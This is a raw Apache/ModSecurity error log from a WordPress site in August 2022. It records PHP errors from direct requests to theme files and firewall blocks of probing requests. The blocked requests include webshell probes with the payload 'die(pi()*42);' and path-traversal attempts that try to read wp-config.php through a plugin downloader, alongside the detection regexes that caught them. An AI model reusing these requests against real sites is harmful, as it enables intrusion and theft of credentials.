24495:tid 140483556738816] [client 152.89.196.13:39574] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/footer.php on line 22 [Sun Aug 21 09:39:10.635747 2022] [:error] [pid 24095:tid 140483623880448] [client 152.89.196.13:39882] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-video.php:15 [Sun Aug 21 09:39:10.635841 2022] [:error] [pid 24095:tid 140483623880448] [client 152.89.196.13:39882] Stack trace: [Sun Aug 21 09:39:10.635855 2022] [:error] [pid 24095:tid 140483623880448] [client 152.89.196.13:39882] #0 {main} [Sun Aug 21 09:39:10.635982 2022] [:error] [pid 24095:tid 140483623880448] [client 152.89.196.13:39882] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-video.php on line 15 [Sun Aug 21 09:39:17.800775 2022] [:error] [pid 24095:tid 140483598702336] [client 152.89.196.13:39884] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:q. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:q: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/qq.php"] [unique_id "YwJDlWsdfSFGDncQyrQeXAAAAA8"] [Sun Aug 21 09:46:22.200621 2022] [:error] [pid 24495:tid 140483607095040] [client 152.89.196.13:39998] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/icon-functions.php:22 [Sun Aug 21 09:46:22.200704 2022] [:error] [pid 24495:tid 140483607095040] [client 152.89.196.13:39998] Stack trace: [Sun Aug 21 09:46:22.200714 2022] [:error] [pid 24495:tid 140483607095040] [client 152.89.196.13:39998] #0 {main} [Sun Aug 21 09:46:22.200798 2022] [:error] [pid 24495:tid 140483607095040] [client 152.89.196.13:39998] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/icon-functions.php on line 22 [Sun Aug 21 10:11:02.472131 2022] [:error] [pid 24495:tid 140483772978944] [client 152.89.196.13:40254] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/index.php:18 [Sun Aug 21 10:11:02.472223 2022] [:error] [pid 24495:tid 140483772978944] [client 152.89.196.13:40254] Stack trace: [Sun Aug 21 10:11:02.472237 2022] [:error] [pid 24495:tid 140483772978944] [client 152.89.196.13:40254] #0 {main} [Sun Aug 21 10:11:02.472316 2022] [:error] [pid 24495:tid 140483772978944] [client 152.89.196.13:40254] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/index.php on line 18 [Sun Aug 21 10:37:10.918188 2022] [:error] [pid 24097:tid 140483598702336] [client 152.89.196.13:40642] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/back-compat.php:26 [Sun Aug 21 10:37:10.918281 2022] [:error] [pid 24097:tid 140483598702336] [client 152.89.196.13:40642] Stack trace: [Sun Aug 21 10:37:10.918296 2022] [:error] [pid 24097:tid 140483598702336] [client 152.89.196.13:40642] #0 {main} [Sun Aug 21 10:37:10.918402 2022] [:error] [pid 24097:tid 140483598702336] [client 152.89.196.13:40642] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/inc/back-compat.php on line 26 [Sun Aug 21 11:41:24.129622 2022] [:error] [pid 24097:tid 140483632273152] [client 152.89.196.13:41830] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/page.php:18 [Sun Aug 21 11:41:24.129716 2022] [:error] [pid 24097:tid 140483632273152] [client 152.89.196.13:41830] Stack trace: [Sun Aug 21 11:41:24.129730 2022] [:error] [pid 24097:tid 140483632273152] [client 152.89.196.13:41830] #0 {main} [Sun Aug 21 11:41:24.129816 2022] [:error] [pid 24097:tid 140483632273152] [client 152.89.196.13:41830] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/page.php on line 18 [Sun Aug 21 11:45:00.467379 2022] [:error] [pid 24096:tid 140483781371648] [client 152.89.196.13:41888] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php:12 [Sun Aug 21 11:45:00.467464 2022] [:error] [pid 24096:tid 140483781371648] [client 152.89.196.13:41888] Stack trace: [Sun Aug 21 11:45:00.467474 2022] [:error] [pid 24096:tid 140483781371648] [client 152.89.196.13:41888] #0 {main} [Sun Aug 21 11:45:00.467561 2022] [:error] [pid 24096:tid 140483781371648] [client 152.89.196.13:41888] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php on line 12 [Sun Aug 21 12:17:50.618289 2022] [:error] [pid 24097:tid 140483531560704] [client 152.89.196.13:42748] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyseventeen/front-page.php:15 [Sun Aug 21 12:17:50.618372 2022] [:error] [pid 24097:tid 140483531560704] [client 152.89.196.13:42748] Stack trace: [Sun Aug 21 12:17:50.618387 2022] [:error] [pid 24097:tid 140483531560704] [client 152.89.196.13:42748] #0 {main} [Sun Aug 21 12:17:50.618483 2022] [:error] [pid 24097:tid 140483531560704] [client 152.89.196.13:42748] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/front-page.php on line 15 [Sun Aug 21 13:44:36.991235 2022] [:error] [pid 24495:tid 140483649058560] [client 152.89.196.13:44072] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/easyrotator-for-wordpress/b.php"] [unique_id "YwJ9FD0FObUnixiW7xOAwgAAAMk"] [Sun Aug 21 15:22:50.862288 2022] [:error] [pid 24495:tid 140483598702336] [client 152.89.196.13:45866] PHP Fatal error: Uncaught Error: Call to undefined function esc_url() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php:18 [Sun Aug 21 15:22:50.862366 2022] [:error] [pid 24495:tid 140483598702336] [client 152.89.196.13:45866] Stack trace: [Sun Aug 21 15:22:50.862376 2022] [:error] [pid 24495:tid 140483598702336] [client 152.89.196.13:45866] #0 {main} [Sun Aug 21 15:22:50.862458 2022] [:error] [pid 24495:tid 140483598702336] [client 152.89.196.13:45866] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php on line 18 [Sun Aug 21 15:22:52.886396 2022] [:error] [pid 24495:tid 140483674236672] [client 152.89.196.13:45870] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/bb.php"] [unique_id "YwKUHD0FObUnixiW7xOBzQAAAMY"] [Sun Aug 21 16:39:05.231276 2022] [:error] [pid 24495:tid 140483682629376] [client 152.89.196.13:47416] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:atime. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:atime: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/js.php"] [unique_id "YwKl-T0FObUnixiW7xOCswAAAMU"] [Sun Aug 21 18:04:16.860863 2022] [:error] [pid 24095:tid 140483682629376] [client 152.89.196.13:51210] PHP Fatal error: Uncaught Error: Call to undefined function the_ID() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php:17 [Sun Aug 21 18:04:16.860958 2022] [:error] [pid 24095:tid 140483682629376] [client 152.89.196.13:51210] Stack trace: [Sun Aug 21 18:04:16.860975 2022] [:error] [pid 24095:tid 140483682629376] [client 152.89.196.13:51210] #0 {main} [Sun Aug 21 18:04:16.861099 2022] [:error] [pid 24095:tid 140483682629376] [client 152.89.196.13:51210] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php on line 17 [Sun Aug 21 19:57:27.427858 2022] [:error] [pid 24095:tid 140483565131520] [client 152.89.196.13:55790] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/Requests/Exception/HTTPS.php"] [unique_id "YwLUd2sdfSFGDncQyrQhvgAAABM"] [Sun Aug 21 20:06:03.132338 2022] [:error] [pid 24495:tid 140483789764352] [client 152.89.196.13:55914] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:tr76ihf. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:tr76ihf: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/class-wp-bar.php"] [unique_id "YwLWez0FObUnixiW7xOIhgAAAME"] [Sun Aug 21 20:31:49.374244 2022] [:error] [pid 24495:tid 140483674236672] [client 152.89.196.13:56354] PHP Fatal error: Uncaught Error: Call to undefined function is_active_sidebar() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php:14 [Sun Aug 21 20:31:49.374327 2022] [:error] [pid 24495:tid 140483674236672] [client 152.89.196.13:56354] Stack trace: [Sun Aug 21 20:31:49.374341 2022] [:error] [pid 24495:tid 140483674236672] [client 152.89.196.13:56354] #0 {main} [Sun Aug 21 20:31:49.374470 2022] [:error] [pid 24495:tid 140483674236672] [client 152.89.196.13:56354] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php on line 14 [Sun Aug 21 22:12:02.285783 2022] [:error] [pid 24097:tid 140483657451264] [client 152.89.196.13:58464] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/.901fc.php"] [unique_id "YwL0Anpj7c70HGTidbAyiwAAAIg"] [Sun Aug 21 23:00:09.937034 2022] [:error] [pid 24097:tid 140483531560704] [client 152.89.196.13:34438] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/languages/.92fb9.php"] [unique_id "YwL_SXpj7c70HGTidbA0ggAAAJc"] [Mon Aug 22 01:26:27.051605 2022] [:error] [pid 24495:tid 140483531560704] [client 152.89.196.13:37758] PHP Fatal error: Uncaught Error: Call to undefined function esc_attr_e() in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php:12 [Mon Aug 22 01:26:27.051687 2022] [:error] [pid 24495:tid 140483531560704] [client 152.89.196.13:37758] Stack trace: [Mon Aug 22 01:26:27.051697 2022] [:error] [pid 24495:tid 140483531560704] [client 152.89.196.13:37758] #0 {main} [Mon Aug 22 01:26:27.051785 2022] [:error] [pid 24495:tid 140483531560704] [client 152.89.196.13:37758] thrown in /home/investig/public_html/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php on line 12 [Mon Aug 22 01:46:10.356487 2022] [autoindex:error] [pid 24096:tid 140483649058560] [client 80.76.51.29:38136] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Aug 22 02:32:29.035488 2022] [:error] [pid 24097:tid 140483781371648] [client 152.89.196.13:39010] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/.19296.php"] [unique_id "YwMxDXpj7c70HGTidbA2TgAAAII"] [Mon Aug 22 06:35:52.222324 2022] [:error] [pid 11662:tid 140240563902208] [client 152.89.196.13:47686] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/.64b20.php"] [unique_id "YwNqGKCwxa7XWl7pJbQh6AAAABY"] [Mon Aug 22 07:45:42.710379 2022] [:error] [pid 11663:tid 140240664614656] [client 152.89.196.13:48976] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/upgrade/.83daa.php"] [unique_id "YwN6dk28DpY-LcBEI18HYgAAAEo"] [Mon Aug 22 08:08:26.448199 2022] [:error] [pid 12359:tid 140240547116800] [client 152.89.196.13:49382] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:bot. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:bot: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/index.php"] [unique_id "YwN_ylpzUWGiw5HA_e1TogAAANg"] [Mon Aug 22 08:10:25.209209 2022] [:error] [pid 11663:tid 140240605865728] [client 152.89.196.13:49426] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/easyrotator-for-wordpress/c.php"] [unique_id "YwOAQU28DpY-LcBEI18HeQAAAFE"] [Mon Aug 22 08:31:10.973808 2022] [:error] [pid 12359:tid 140240706578176] [client 20.70.190.233:49764] [client 20.70.190.233] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/fwduvp/content/downloader.php?path=../../../../wp-config.php&name=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/fwduvp/content/downloader.php"] [unique_id "YwOFHlpzUWGiw5HA_e1T2QAAAMU"], referer: www.google.com [Mon Aug 22 08:31:11.404321 2022] [:error] [pid 11664:tid 140240614258432] [client 20.70.190.233:49766] [client 20.70.190.233] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/fwduvp/content/downloader.php?path=../../../../wp-config.php&name=../../../../wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/fwduvp/content/downloader.php"] [unique_id "YwOFH5acno7nMFKYusOjrQAAAJA"], referer: www.google.com [Mon Aug 22 09:05:01.984954 2022] [:error] [pid 11662:tid 140240614258432] [client 152.89.196.13:50318] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:bot. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:bot: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/index.php"] [unique_id "YwONDaCwxa7XWl7pJbQiUgAAABA"] [Mon Aug 22 09:08:22.648167 2022] [:error] [pid 11663:tid 140240580687616] [client 15.235.44.167:50456] [client 15.235.44.167] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] 